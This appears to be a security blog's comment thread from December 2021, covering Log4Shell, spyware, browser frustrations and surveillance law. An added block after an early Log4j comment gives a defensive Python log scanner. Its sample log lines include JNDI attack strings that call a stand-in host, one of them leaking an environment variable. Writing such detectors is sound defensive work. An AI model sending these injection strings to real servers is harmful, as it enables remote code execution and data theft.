Comments

ResearcherZero December 10, 2021 7:38 PM

Khalilzad joined Trump in a conference room, along with Vice-President Mike Pence, Bolton, and other national-security officials. He described the Taliban’s promise that they would not allow Al Qaeda to attack the U.S. When it was noted that Ghani was unhappy with the deal, Trump said, “Why are you wasting your time going to talk to Ghani? He’s a crook.”

Trump then asked Khalilzad if he could give the Taliban “something to make them coöperate.”

“What are you talking about, Mr. President?”

“Like money.”

“No,” Khalilzad replied. “They’re on a terrorism list. We can’t give them money.”
https://www.newyorker.com/magazine/2021/12/20/the-secret-history-of-the-us-diplomatic-failure-in-afghanistan

lurker December 10, 2021 9:30 PM

@SpaceLifeForm

[Rhetorical question] Why would I want a remote connection to write arbitrary data to my logfiles? But of course by eschewing such java jiggery-pokery I again am not the target demographic…

SpaceLifeForm December 10, 2021 11:14 PM

@ lurker

You may not be a target, but do you interact with one?

I suspect Apple, Amazon, and Ubiquiti are sweating bullets now.

This log4j problem has probably been exploited for a long time.

That it can leak server-side environment variables to the attacker controlled DNS server (because the DNS traffic is most certainly cleartext), is, well, not good.
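A defensive log-scanning example added here (not code from any commenter): it flags access-log lines carrying a Log4j JNDI lookup string and lists any `${env:…}` or `${sys:…}` references nested inside it, which is the variable leak SpaceLifeForm's comment refers to. The function and the sample log lines are constructed for this illustration.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Constructed detector. A JNDI lookup string planted in a request field is the
# indicator; a nested ${env:...}/${sys:...} inside it is the leak the comment
# above describes: the server resolves the variable before the outbound lookup,
# so its value leaves in the cleartext DNS/LDAP query.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
VAR_LOOKUP = re.compile(r"\$\{\s*(env|sys)\s*:\s*([A-Za-z_][A-Za-z0-9_.]*)", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    client: str
    leaked_vars: List[str] = field(default_factory=list)


def scan_access_log(lines):
    """Return one Finding per log line that carries a JNDI lookup string."""
    findings = []
    for n, line in enumerate(lines, start=1):
        if not JNDI_LOOKUP.search(line):
            continue
        client = line.split(" ", 1)[0]  # first field of a common-log-format line
        names = [m.group(2) for m in VAR_LOOKUP.finditer(line)]
        findings.append(Finding(n, client, names))
    return findings


# Constructed sample lines in Apache common log format. 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges; example.invalid never resolves.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:22:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:22:01:05 +0000] "GET /login HTTP/1.1" 200 777 "-" '
    '"${jndi:ldap://example.invalid/a}"',
    '203.0.113.9 - - [10/Dec/2021:22:01:09 +0000] '
    '"GET /?q=${jndi:dns://${env:HOSTNAME}.example.invalid} HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    '198.51.100.4 - - [10/Dec/2021:22:02:00 +0000] "GET /status HTTP/1.1" 200 17 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        refs = ", ".join(f.leaked_vars) or "none"
        print(f"line {f.line_no}: {f.client} sent a JNDI lookup; nested env/sys refs: {refs}")
```

A hit from this scanner is a reason to check outbound DNS and LDAP logs from the same period for the server's egress, not proof of compromise on its own.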

JonKnowsNothing December 11, 2021 1:13 AM

@All

Several MSM reports about reconstructing the “Spiral Letter Lock” used by Mary Queen of Scots on her last letter written the night before her execution.

Some are descriptions, while Ars has a set of diagrams about how the locks were done.

A sliver of paper was semi detached from an edge of the letter. It was woven through a slot(s) in a weave and the tail left on the outside of the letter.

The letters were folded into a tiny packet and some locks passed through 60+ layers of paper.

If the lock was damaged while threading it, the letter was rewritten.

The lock didn’t make the letter secure but if anyone other than the designated recipient opened the letter, the lock would be obviously broken.

The lock cutout left a noticeable jagged edge to the sheet. Previous conservation efforts often filled in the gap not recognizing it for the open lock shape.

===

htt p s://www.the guardi an.c om/books/2021/dec/10/mary-queen-of-scots-locked-final-letter-using-paper-folding-research-finds

h ttp s://arstech nica. co m/science/2021/12/mary-queen-of-scots-sealed-her-final-missive-with-an-intricate-spiral-letterlock/

Ted December 11, 2021 2:49 AM

@SpaceLifeForm, ALL

Re: Log4j

Adding to that:

https://en.m.wikipedia.org/wiki/Log4j

“A remote code execution zero-day vulnerability in Log4j 2, called Log4Shell (CVE-2021-44228), surfaced on December 9, 2021. Affected services include Cloudflare, iCloud, Minecraft: Java Edition, Steam, Tencent QQ, and Twitter.[37][38][39] The feature causing this vulnerability can be disabled with a configuration setting, which has been disabled by default in version 2.15.0, officially released a few days prior.[40] The Apache Software Foundation has assigned the maximum CVSS severity rating of 10 to Log4Shell.[39]”

Ted December 11, 2021 2:58 AM

Also, from SANS ISC:

“RCE in log4j, Log4Shell, or how things can get bad quickly”

“Yesterday a PoC for a Remote Code Execution vulnerability in log4j was published. The exploit is actually unbelievably simple – which makes it very, very scary at the same time.”

https://isc.sans.edu/diary/28120

Clive Robinson December 11, 2021 3:34 AM

@ SpaceLifeForm,

For example, you could have addressed various security related issues, such as log4j Log4Shell

It’s kind of ironic that you should mention “Log4j”…

From Wikipedia on it,

“Log4j is one of several Java logging frameworks. Gülcü has since started the SLF4J…”

Is someone trying to tell us something?

As they say “Once is happenstance…”

Curious December 11, 2021 4:08 AM

I’ve never heard of this before, but apparently this is not news it seems as I watched the video in the twitter link below. No idea if this has been discussed previously on this blog, might be old stuff.

Something about hacking your monitor screen so that it overlays some extra graphics by pixels over your browser content rendered on screen, e.g. showing an overlay with a region of pixels of a lock icon indicating a secure connection for one’s browser, but without you necessarily noticing anything odd about it. Or tricking you by showing the wrong amount of money on screen when doing a transaction.

https://twitter.com/TechInsider/status/1469603918397247490

Freezing_in_Brazil December 11, 2021 6:53 AM

@ SpaceLifeForm

Any input as to what the software architecture is

I haven’t dwelled on this specific case yet. But in my experience, I dare say it didn’t involve anything very sophisticated [starting with the poorly worded note the crackers left on the site].

The current government is dismantling the scientific-technological structure put together with effort over the last 60 years. Just look at the website of the national weather service[1], which is practically abandoned [under the complacent gaze of the minister of technology, the right-wing (no pun) ‘astronaut’, Marcos Pontes].

The services affected this time were a distance learning platform serving certain internal ministry programs and an IConnect system [platform for booking and payment]. I bet on software configuration issues, and I’m pretty sure weak passwords played a role.

You will never lose money betting on the incompetence of the Brazilian government.

[1]htps://cptec.inpe.br

Clive Robinson December 11, 2021 7:02 AM

@ Curious,

Something about hacking your monitor screen so that it overlays some extra graphics…

There are many ways this can be done.

Over a decade and a half ago people were developing malware that was effectively an “I/O Driver Shim”.

https://en.m.wikipedia.org/wiki/Shim_(computing)

Where they hijacked the OS driver for the screen and overwrote what should have been displayed in a banking application.

The difficulty is not developing code to “overwrite” but correctly identifying “where to overwrite”. Obviously the closer to the application you do that, the easier it is.

Freezing_in_Brazil December 11, 2021 8:43 AM

@ SLF, All

re the cracking of the BR ministry of health

I may have made mistakes in my statements above, citing IConnect [there is a plethora of ‘software solutions’ with this name all over the internet, none of them FOSS].

In fact the software is called ConectSUS [SUS =~ NHS], a CRM program allegedly developed internally. Which doesn’t make things any better. When it comes to the development of systems for the government, there is a history of involvement of crony contractors, to the detriment of companies with technical capacity and assured quality.

By the way, this type of software is usually proprietary and its discussion is not encouraged. It is an unbelievably opaque environment for people used to European/American standards.

It is cause for celebration to have found this document:

htps://scielosp.org/pdf/csp/2021.v37n3/e00243220/en

From the document [sic]:

The Brazilian scenario features a tool that contributes to practice in primary healthcare (PHC): the e-SUS APS (https://aps.saude.gov.br/ape/esus), a strategy by the Department of Family Health to organize healthcare information in PHC in the country 8 and to allow access to information and use of the citizen’s electronic file 9. The e-SUS APS features an online scheduling functionality by which patients can remotely schedule appointments at health units.

Anders December 11, 2021 9:51 AM

And people DON’T learn…

hxxps://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf

Anders December 11, 2021 10:12 AM

@ALL

Since my post vanished, repost. This also explains why that old BlackHat presentation link is important.

hxxps://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/

JonKnowsNothing December 11, 2021 12:52 PM

@All

re: A guessing compiler

MSM report on FF95 update includes:

On both macOS and Windows, Mozilla has “improved page load performance by speculatively compiling JavaScript ahead of time.”

FF94 included

… new color themes and made changes to the way updates were delivered

iirc(badly) I looked at the FF94 change list, when the first FFNagWare Message Popups happened, the change to the way updates were delivered was:

  Now Automatic, No Approvals, No Warning, No OptOut.

I got to the part about AutoAccept NoOptOut and AutoInstall and stopped reading.

I’m fairly sure I don’t need “new color themes” and I don’t need “A Guessing Compiler” to compile something that’s blocked on my system.

I wonder if Google$$ have something to do with the focus on “new color themes”? Must be masses and masses of users just clamoring for new colors…

But then, I don’t even use DarkMode. I can’t see the teeny white blips that are supposed to be letters.

===

h tt ps:/ /ars technica.c om/gadgets/2021/12/firefox-95-for-windows-and-mac-introduces-rlbox-a-new-sandboxing-tech/

Clive Robinson December 11, 2021 1:31 PM

@ JonKnowsNothing, ALL,

I’m fairly sure I don’t need “new color themes” and I don’t need “A Guessing Compiler” to compile something that’s blocked on my system.

I’m fairly certain I don’t need FireFox and have not for years…

I’d get rid of Android if I could, but there does not appear to be any choice in the market, so much for “The Free Market”.

I’m of the opinion vanilla HTML 3.x without JavaScript, Cookies or other crapware is really all I need.

As for HTML 5.0, not interested in the slightest; the W3C sold out to Google and Co several years ago… 75% of it is unwanted liability that people appear determined to stop you turning off.

A thought for you,

“Who owns your browser?” when that “click accept all box” pops up all over anything else being displayed and you can not get rid of it except by clicking on “accept all theft and liability” or the back button or close the window…

Simple answer “not you”…

Do I need software on my system/device that is “not fully under my control”? Simple answer “No Way José”…

Do I need to keep those FF numpties employed to steal from me? No.

People should not have anything to do with them.

Even Tor-Browser is a liability to users, especially with large ISPs assuming that they have the right to “sell you” to make more than a little more. Nearly all of which I blame on the likes of Google…

Anders December 11, 2021 3:21 PM

@JonKnowsNothing @ALL

I feel your pain.

Some time ago I downgraded FF to the pre-Quantum era. Some places won’t open any more, but for those I have VBOX with a temporary system.

One reason for the downgrade was the fact that new FF versions hog the system and crash it on certain websites.

I’m not alone.

hxxps://stackoverflow.com/questions/33797824/firefox-svg-animation-freezes-on-specific-pc

Really, you can have a multi-core latest system and FF turns it into a system that doesn’t even react to any input no matter how long you wait.

Pre-Quantum at least still has the option to control the updates. Also I hate the direction FF has taken, removing user control, removing features with updates (yes, no more FTP support, sigh). I remember times when FF arrived, something like 15 years ago, it was a snappy and nice browser. Now it’s only a resource hog.

And i also hate the direction the modern web has taken.

But we can’t live without web either.

This would be a nice thread to ask what is a nice browser today for Linux and Win? Would be nice if there’s still XP support too. Thanks for any input.

Anders December 11, 2021 3:41 PM

@ALL

Enjoy, a nice whitepaper.

“Jumping the air gap: 15 years of nation‑state effort”

hxxps://www.welivesecurity.com/2021/12/01/jumping-air-gap-15-years-nation-state-effort/

Ted December 11, 2021 4:11 PM

Hi @ALL

There is a richly-saturated podcast episode that came out on December 10.

It digs into the current state of intl. spyware companies and the fomenting response of the US gov to try to rein back many highly irresponsible activities.

The episode begins with an account from Hungarian journalist Szabolcs Panyi. In 2019 he was investigating a Russian bank that was relocating to Budapest and may have been a front for Russian intelligence. He was looking into why Hungary’s president didn’t seem to take this risk seriously.

And Pegasus spyware got dropped on his phone.

From Panyi:

And that’s the biggest problem because, of course, my privacy was invaded very brutally with this software. But also my right to protect my sources has been infringed.

Additional guests on the podcast include Citizen Lab’s John Scott-Railton, Steven Feldstein of the Carnegie Endowment for International Peace, and Yaakov Katz, editor-in-chief of The Jerusalem Post.

An interesting concern IMO is the entanglement of many former security officials in these privatized companies. It’s also eyebrow-raising that groups like the NSO are not intending to stop with the deployment of their products to only autocratic countries, but are honing these products to sell to the regional and municipal policing forces of western countries. Without good oversight, this could be a real clusterf*ck of civil society violations.

https://www.wbur.org/onpoint/2021/12/10/why-the-u-s-is-cracking-down-on-international-spyware

AL December 11, 2021 4:46 PM

@JonKnowsNothing
As far as the Firefox update business is concerned, on Windows disable BITS.
https://www.askvg.com/tip-block-firefox-to-download-updates-using-bits-on-windows/

There are two backdoors that browsers use, BITS and winhttp.
In Firefox, I block these DLLs in EMET, and it still runs. Other browsers don’t run.

“winhttp.dll;qmgr\*.dll;wbem\*.dll;msctf.dll;combase.dll”

For me, Firefox is my primary browser. I like EMET because it takes wildcards. Trying to shut off WMI without wildcards would be a pain.

Clive Robinson December 11, 2021 5:20 PM

@ Anders, JonKnowsNothing, ALL,

But we can’t live without web either.

Can’t we?

Funny, I spent oh must be half my life without it before “NetScrap” got going, I even remember exactly why it was called “javascript” even though it had absolutely nothing whatsoever to do with Oak/Java at the time.

Then there was getting HTTPS PubKey the wrong way around, and NetScrap’s random generator boo-boo…

Microsoft doing their “embrace and extend” and telling lots of lies in Court about IE…

Who remembers when you couldn’t have the Web without Adobe or MacroMedia installed or even Java at one point…

HTML was useful up to version 3.2ish, then it was all unwanted “feature load”.

Now I am seriously looking at getting a “text only” browser up and running, might even “shell script” something around wget and stunnel for a laugh, I used to do it for “scraping” back in the late 1990’s.

What’s the betting it can be got going on a Raspberry Pi Zero 2 W running Deb Linux… With a serial port for a terminal, touch screen HDMI display, and I’ve got a 2G phone[1] without GPS but with “data” and a micro USB socket to use as a mobile modem (you can buy one new for less than ~$/€15).

Might make a fun project to do over the “Winter Solstice” after all with festive omicron glittering from “Jack Frost’s Nose”, indoors in front of the fire is looking like the thing to be doing. Especially as they are now talking about “Plan C for Christmas”…

[1] Not sure what the status of 2G is around the world, in the UK it looks like 3G is going but 2G is staying for now… Apparently way too many 2G users but darn few 3G these days, with 4G LTE giving most people what they need…

Anders December 11, 2021 5:24 PM

@Clive

“Can’t we?”

Take this place…it’s web…browser is needed, even proper https is NEEDED, you remember my cries, don’t you?

John December 11, 2021 5:33 PM

@Clive,

I use dillo -l realURL when I can. Works well with many sites. Load garbage just gets ignored.

I use an old SeaMonkey that uses wget to get pdfs. Works well also for many pdfs including the recent one about air-gapped systems.

For ‘garbage sites’ I load a recent 64 bit Linux and use a recent Firefox or whatever. Always a real pain!

This is AntiX 19.3 I think. Newer versions of AntiX don’t seem to work very well?? Oh, well. This version is fast to load. And fast to kill and restart when it gets hacked.

And as you note: The web is becoming basically garbage dominated by the Google Giggle and friends and their anti-social programs.

john

someone December 11, 2021 5:45 PM

@Clive re text browser – is any of the source code for Lynx still viable? I’ve actually thought about rolling my own browser myself. Although I might want some primitive image support. Currently using ungoogled chromium completely locked down. It’s the best I’ve been able to do recently, but I don’t really trust that, either.

someone December 11, 2021 5:48 PM

@ResearcherZero re: payments to terrorist watch list entities – I’m certain that no covert US agency has ever funneled cash to any organization on such a list, right?

Anders December 11, 2021 5:50 PM

(mental note to myself)

Some suggestions here, but still, are there any better choices?

hxxps://restoreprivacy.com/browser/secure/

JonKnowsNothing December 11, 2021 6:37 PM

@Anders, @Clive, @ALL

re: Really, you can have a multi-core latest system and FF turns it to system that don’t even react on any input no matter how long you wait.

I have a multicore system (old). When FF added the multi-thread the setting defaulted to 8 cores. My system froze solid.

It took some roundabout testing to find out why my system went from AOK to a pile of dead iron. Setting the cores to 1 worked.

It’s another example of stuff not needed, stuff not tested, designed obsolescence.

My response when anyone asks why I turn off such improvements:

The internet is like a garden shed. It did the job it was designed to do.

Then someone decided to add on to the garden shed.

After so many add-ons they’ve built the Taj Mahal on top of the garden shed.

The garden shed is collapsing under the weight.

@Clive

re: Now I am seriously looking at getting a “text only” browser up and running, might even “shell script” something around wget and stunnel

If you make it into a kit I’d buy it. Maybe even a bunch. (1)

===

1) In the dust bowl of California all tech is hard to come by.

Clive Robinson December 11, 2021 6:46 PM

@ Anders, ALL,

Enjoy, a nice whitepaper.

It’s made me smile for a couple of good reasons,

1, There is stuff missing from 2003ish that’s still around.
2, Not all “air gap crossing” was “Nation State”.

Longterm readers will know why I know this… Let’s just say it was to do with “Voting Machines” and leave it at that 0:)

Anders December 11, 2021 7:07 PM

@Clive @ALL,

“Now I am seriously looking at getting a “text only” browser up and running, might even “shell script” something around wget and stunnel for a laugh, I used to do it for “scraping” back in the late 1990’s”

While it might be fun, this site still remains the web that requires https and a reasonably fresh browser (luckily I still can use it with pre-Quantum era FF).

But what might be actually cool and fun: recreate an old-school BBS mirroring this site. The possibility to read and post entries here over telnet from any old DOS-based client would be just awesome.

Ted December 11, 2021 7:43 PM

“Even several years later, Rambo is still furious at the bar for giving Watkins his credit card receipt.”

Let’s talk ‘Operation Whistle Pig.’

Whistle Pig was the name of the drink Jeffrey Rambo ordered at the bar where he covertly investigated Politico reporter Ali Watkins in 2017. He suspected that James Wolfe, former director of security for the Senate Intelligence Committee, was providing Ali information and access in exchange for a personal relationship with her.

Jeffrey Rambo was a Customs and Border Patrol agent who worked in the National Targeting Center. He still works at the CBP. Ali Watkins is now a journalist at the NY Times.

The rub was that Rambo and the groups he worked with may have been out of scope as they rummaged through numerous sensitive government databases, for which Rambo says there were few access rules.

Rambo’s Counter Network Division is tagged as a “bridge between law enforcement agencies and the intelligence community that prided itself on taking “out of the box” approaches.”

But Hugh Handeyside, the ACLU attorney, says “these very lack of procedures are the heart of the problem: “We’re in a very dangerous place if having no rules means officers can’t break any rules.””

“Department of Homeland Security Office of Inspector General launched an investigation into Rambo, who was put on administrative leave. The probe, conducted jointly with CBP’s Office of Professional Responsibility, focused on whether Rambo improperly accessed government databases to get information on Watkins and Wolfe without a need to know, and if he’d used that information to question Watkins about possible leaks of classified information outside the scope of his official duties.”

Ultimately the decision was made not to prosecute Rambo.

“That doesn’t surprise Geoffrey Stone, a University of Chicago law professor and constitutional law expert who has reviewed surveillance programs. When the government wants to investigate someone for doing something illegal or inappropriate, it has free rein so long as it doesn’t violate any specific law. “If there is no law or policy that specifically regulates it, then there’s nothing that prohibits it,” he said.”

Jeffrey Rambo now works his day job at the CBP. And he’s also opened a coffee shop – Storymakers Coffee Roasters in the Barrio Logan section of San Diego, home to a tight-knit Latino community.

Rambo, however, is not receiving an overwhelming amount of love in his neighborhood currently.

“In late September, he arrived one morning and found a photo of himself plastered to a telephone pole outside, identifying him as a Border Patrol agent. It called him a racist who tried to blackmail a journalist. Some posters had a QR code that linked to a list of articles about Rambo.”

If only the bar where he ordered his Whistle Pig hadn’t given Watkins the receipt with his real name.

https://news.yahoo.com/operation-whistle-pig-inside-the-secret-cbp-unit-with-no-rules-that-investigates-americans-100000147.html

PS: If you think this is long, the original article is about 7,000 words.

ResearcherZero December 11, 2021 9:16 PM

@Ted

“Prosecutors can bring charges against people for sharing information with the public only when classified or other national security material is at issue. Material cannot be classified to conceal legal violations or prevent embarrassment.”

https://www.archives.gov/isoo/policy-documents/cnsi-eo.html#one

“We are reviewing the entire process of how we conduct media leak investigations by responding to issues that have been raised by our career prosecutors and agents,” Rosenstein said. “We’re taking basically a fresh look at it. . . . We don’t know yet what, if any, changes we want to make, but we are taking a fresh look.”

Coats said the hunt for reporters’ sources would go well beyond the intelligence agencies. “These national security breaches do not just originate in the intelligence community. They come from a wide range of sources within the government, including the executive branch and including the Congress,”

https://www.washingtonpost.com/world/national-security/attorney-general-says-justice-dept-has-tripled-the-number-of-leak-probes/2017/08/04/1a395064-791d-11e7-9eac-d56bd5568db8_story.html

“I’m called a rogue Border Patrol agent, I’m called a right-hand man of the Trump administration, I accessed data improperly, I violated her constitutional rights — all of these things are untrue,” Rambo told Yahoo News. “All these things are standard practices that — let me rephrase that. All of the things that led up to my interest in Ali Watkins were standard practice of what we do and what we did and probably what’s still done to this day.”

lurker December 11, 2021 9:37 PM

@Anders: firefox-svg-animation-freezes-on-

-dancing-gerbils? Kids, .gif was good enough for grandad, that chunky pixelation is just a reminder who’s paying for your internet…

ResearcherZero December 11, 2021 10:06 PM

@Ted

“The United States has, of course, an important national interest in protecting national security information against unauthorized disclosure,” Garland wrote in his memo. “But a balancing test may fail to properly weight the important national interest in protecting journalists from compelled disclosure of information revealing their sources, sources they need to apprise the American people of the workings of their government.”

The memo makes clear that federal prosecutors can, in some cases, obtain journalists’ records. Those exceptions include if the reporters are suspected of working for agents of a foreign power or terrorist organizations, if they are under investigation for unrelated activities or if they obtained their information through criminal methods like breaking and entering. There are also exceptions for situations with imminent risks, like kidnappings or crimes against children.

Others whose records were obtained were Democratic members of Congress and aides and former White House counsel Don McGahn.
https://apnews.com/article/justice-department-reporters-records-merrick-garland-e2348419815ef84dc75cbecd7e546b39

Although improperly obtained evidence may have been used to prosecute leaks, generally, embarrassment was considered a much higher priority than breaking the law. But, the official position is that going “Rambo” is to be frowned upon.

Ted December 11, 2021 10:11 PM

@ResearcherZero
“Material cannot be classified to conceal legal violations or prevent embarrassment.”

Interesting.

I am so upset I can’t find a tweet where someone lamented that even a christmas letter had been classified. It was funnier than I am making it sound.

Thanks for the info on the EO and the ratcheting up of investigations on media leaks.

more…

Ted December 11, 2021 10:13 PM

@ResearcherZero

cont.

I think our friend Rambo got a little gung-ho however.

“Rambo, who was later pressed repeatedly about why he chose to reach out to Watkins, a reporter who had never written about forced labor, said he was looking for prominent journalists with access and buzz. He told investigators he wanted to identify national security journalists who could not just tell CBP about forced labor but also publish stories that would allow him to “overstate” U.S. enforcement capabilities. Rambo believed these stories inflating U.S. capabilities would prompt shippers to alter their routes, proving they were involved in illegal activities.”

A bit of a stretch for being asked to look at forced labor used for cobalt mining in the Dem. Rep. of Congo for consumer goods in China. (wat?)

It looks like Bruce has written much about the risks of over classification.

If I find that tweet I will post it.

Ted December 11, 2021 10:23 PM

@ResearcherZero

But, the official position is that going “Rambo” is to be frowned upon.

Haha! Yes, but as you draw out some complexity, checks and balances are good.

ResearcherZero December 11, 2021 11:47 PM

@Ted

Checks and balances definitely are good, as unofficially or “off-the-record”, “going Rambo” at arm’s length, or where it can not be proven, is not always frowned upon, and increasingly so it would seem.

“The numbers of more than 180 journalists are listed in the data, including reporters, editors and executives at the Financial Times, CNN, the New York Times, France 24, the Economist, Associated Press and Reuters.”
https://www.theguardian.com/world/2021/jul/18/ft-editor-roula-khalaf-among-180-journalists-targeted-nso-spyware

“A successful infection enables an NSO client to access everything on the device, including contacts, chat messages – and precise location. Pineda’s phone disappeared from the scene of his murder, so a forensic examination to determine if it was targeted or infected with spyware was not possible.”

“The gunmen who murdered him could have learned of his location at a public carwash through means not related to NSO’s technologies, or its clients. But his attackers knew exactly where to find him, even though the hammock where he lay was not visible from the street.”

“People with power can do whatever they want to anyone,” said his widow, Marisol Toledo, when told Pineda had been selected for potential targeting. “If they succeeded [in infecting his phone], they would have known where he was at all times.”
https://www.theguardian.com/news/2021/jul/18/revealed-murdered-journalist-number-selected-mexico-nso-client-cecilio-pineda-birto

“I think once you choose to charge Assange with publishing information that the Government said was secret, it’s not a huge step to charge The New York Times or a New York Times reporter or editor with publishing information the Government said should be secret,”
https://www.abc.net.au/news/2019-07-29/trump-administration-after-assange-and-it-serves-as-a-warning/11350854

Spain’s National Court is investigating a Spanish private security firm on suspicion it spied on Julian Assange on behalf of the US while he was inside the Ecuadorean embassy in London, according to a ruling made public on Wednesday.

The court said Morales paid €20,000 (US$22,000) a month in cash to the head of security at the embassy to ensure that there were no negative reports about Undercover Global that could lead to its contract being terminated.
https://www.scmp.com/news/world/europe/article/3032260/spanish-firm-undercover-global-accused-spying-wikileaks-founder

ResearcherZero December 12, 2021 12:28 AM

@Ted

If governments do get caught doing something wrong, they resort to changing the law.

For example, it used to be illegal for New Zealand’s foreign intelligence agency, the Government Communications Security Bureau to spy on the public in New Zealand, so the law was changed after they were caught illegally spying.

“the agency wrongly spied on Kiwis in the Pacific, and used its eavesdropping powers to snoop on rival candidates for the job of World Trade Organisation boss”
https://www.stuff.co.nz/national/politics/80303385/new-gcsb-director–a-consummate-public-servant

The GCSB lost control of its surveillance technology and wasn’t aware its systems continued spying on Kim Dotcom, according to new documents from the spy bureau.

It claimed that it turned off all surveillance systems targeting Dotcom and others but found out more than a year later that surveillance continued without its knowledge.

The details in the documents have led Dotcom to state that there is now evidence the United States’ National Security Agency was carrying out surveillance on him.

Dotcom, who should have been protected from GCSB surveillance as a New Zealand resident, said the GCSB did not know because its equipment was being used by the NSA, which was “directly involved”.
https://www.nzherald.co.nz/nz/gcsb-had-no-idea-spy-gear-was-still-targeting-kim-dotcom/P55O2VGPHPIZVLQXSUNKVLLBIM/

Law Commissioner Donna Buckingham said the act, which governs the search and surveillance activities of police and some other enforcement agencies, is already working well after becoming law in 2012.

“The act does not need a major overhaul. All we are proposing are amendments to make the law clearer and to update it in response to the effects of new technology,” she said.
https://www.nzherald.co.nz/nz/joint-review-recommends-changes-to-search-and-surveillance-laws/SIW5LBCEWRB7TK2RSCVY4YYLJA/

The National Security Act of 1947 contained a specific ban on intelligence operatives from operating domestically. In the 1970s, America learned about the extensive domestic political spying carried out by the FBI, the military, the CIA, and the NSA, and Congress passed new laws to prevent a repeat of those abuses.

The law on surveillance begins with the Fourth Amendment to the Constitution, which states clearly that Americans’ privacy may not be invaded without a warrant based on probable cause.

The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no warrants shall issue, but upon probable cause, supported by oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized.

The US Supreme Court (US v. Katz 389 US 347) has made it clear that this core privacy protection does cover government eavesdropping. As a result, all electronic surveillance by the government in the United States is illegal, unless it falls under one of a small number of precise exceptions specifically carved out in the law.

United States Code Title 50, Chapter 36, Subchapter 1
Section 1809. Criminal sanctions

(a) Prohibited activities
A person is guilty of an offense if he intentionally-

(1) engages in electronic surveillance under color of law except as authorized by statute

There are only three laws that authorize any exceptions to the ban on electronic eavesdropping by the government. Congress has explicitly stated that these three laws are the exclusive means by which domestic electronic surveillance can be carried out (18 USC, Section 2511(2)(f)). They are:

Title III and the Electronic Communications Privacy Act make up the statutes that govern criminal wiretaps in the United States.
FISA. The Foreign Intelligence Surveillance Act is the law that governs eavesdropping on agents of "foreign powers" within the United States, including suspected foreign terrorists.

Title III and ECPA govern domestic criminal wiretaps and are not relevant to the NSA’s spying. FISA is the law under which the NSA should have operated. It authorizes the government to conduct surveillance in certain situations without meeting all of the requirements of the Fourth Amendment that apply under criminal law, but requires that an independent Foreign Intelligence Surveillance Court oversee that surveillance to make sure that Americans who have no ties to foreign terrorist organizations or other “foreign powers” are not spied upon.

…warrantless surveillance would have been legal for only 15 days after the resolution was passed on September 18, 2001.

FISA contains explicit language describing the president’s powers “during time of war” and provides that “the President, through the Attorney General, may authorize electronic surveillance without a court order under this title to acquire foreign intelligence information for a period not to exceed fifteen days following a declaration of war by the Congress.” 50 U.S.C. § 1811 (emphasis added).

Ted December 12, 2021 12:58 AM

@ResearcherZero

Re: 180 journalists

Those are real flesh and blood people.

“When you think that there was a camera, and maybe there is a camera in your toilet, your body stops functioning”

“The Pegasus Project: Life for Khadija Ismayilova in Azerbaijan’s Digital Autocracy”

https://youtu.be/AN7EOiyOvl4?t=218

Re: Mexico

“Mexico is the world’s most dangerous country for reporters outside of warzones.”

Wow.

Re: Assange

“There’s an irony here that Julian Assange helped get Trump elected, yet now the President wants to prosecute him.”

Zero trust.

Re: SCMP article

Hiding behind a paywall.

But this: “Security company allegedly installed hidden microphones in fire extinguisher at Ecuadorean embassy and in women’s toilets where Assange met his lawyers”

Enough with the toilets already.

Gerard van Vooren December 12, 2021 1:12 AM

@ Clive Robinson • December 11, 2021 5:20 PM,

Yes, I agree entirely. In the recent past I was thinking about “updating” the Gopher protocol to become “more modern”, because I think that “the web” has become obsolete (for me). Why is the web obsolete? Because when I search for things about technology, such as installing a new server, I always end up with guys that wrote things for “their” setup (R0.2.48.83, with “their” framework “R0.1.24.838403”), not mine, and I end up with lots of other crap. For instance, I want to set up Mastodon, and even after a couple of weeks I still don’t have it running. I know I am not as bright as the guy who wrote that article, but I know that I am not as dumb as well. My girlfriend also has problems with the web, but I don’t think that I can ever have that much influence over her, so I am afraid that she is a lost case when we are talking about “the new technology”. The only thing that she wants is a new tablet. And she doesn’t care about all the ads that she gets…

So I did a bit of research about Gopher and I looked at the wiki page. There is nothing wrong with the Gopher protocol, except that you don’t get a “menu box” where you can fill in a form. This lack is something that is missing. I mean something like the forms that you could create with Turbo Pascal/C. Those kinds of forms. It is not there. The rest could all be the same but this is necessary. And of course also authentication should be updated. How can you be sure that you are dealing with the right guy? So also DNS should be updated.

Well, these are my ideas. You are free to attack.

Ted December 12, 2021 1:35 AM

@ResearcherZero

Re: New Zealand’s foreign intelligence agency, the Government Communications Security Bureau

“But the fact we do seek intelligence about the intentions, capabilities, and activities of foreign parties shouldn’t come as a surprise. That’s one of the key reasons we exist.”

And intelligence on Kiwis too.

What channels does NZ’s GCSB communicate on? Not on Twitter?

Anonymous December 12, 2021 1:48 AM

@ Gerard van Vooren • December 12, 2021 1:12 AM

Do you know about hxxps://gemini.circumlunar.space

ResearcherZero December 12, 2021 3:14 AM

@Ted

I think GCSB mainly concerns itself with monitoring social media and maintaining a low-key presence. Many such bureaus don’t have an official account.

The danger with regard to the lack of procedural safeguards for prisoners’ privileged communications is that it leads to what Lord Phillips, in his dissenting judgment in re McE, described as the, “chilling factor that LPP is intended to prevent.”

That is, when the law allows the state to listen in on privileged communications, clients feel unable to speak openly with their lawyers. The consequences of this are potentially devastating. Without the full facts, counsel may not be aware of all potential avenues of legal redress available to the prisoner in respect of, amongst other matters, appeals, probationary hearings and complaints as to his or her mistreatment whilst in prison.

This goes to the heart of the criminal justice system and is a very real concern. On 11 November 2014, the then Lord Chancellor and Secretary of State for Justice was forced to announce to the House of Commons that, between 2006 and 2012, there had been a number of instances where telephone calls between a prisoner and his or her lawyer (and, separately, telephone calls between a prisoner and his or her constituent MP) had been wrongly recorded and in some cases listened to by prison staff.
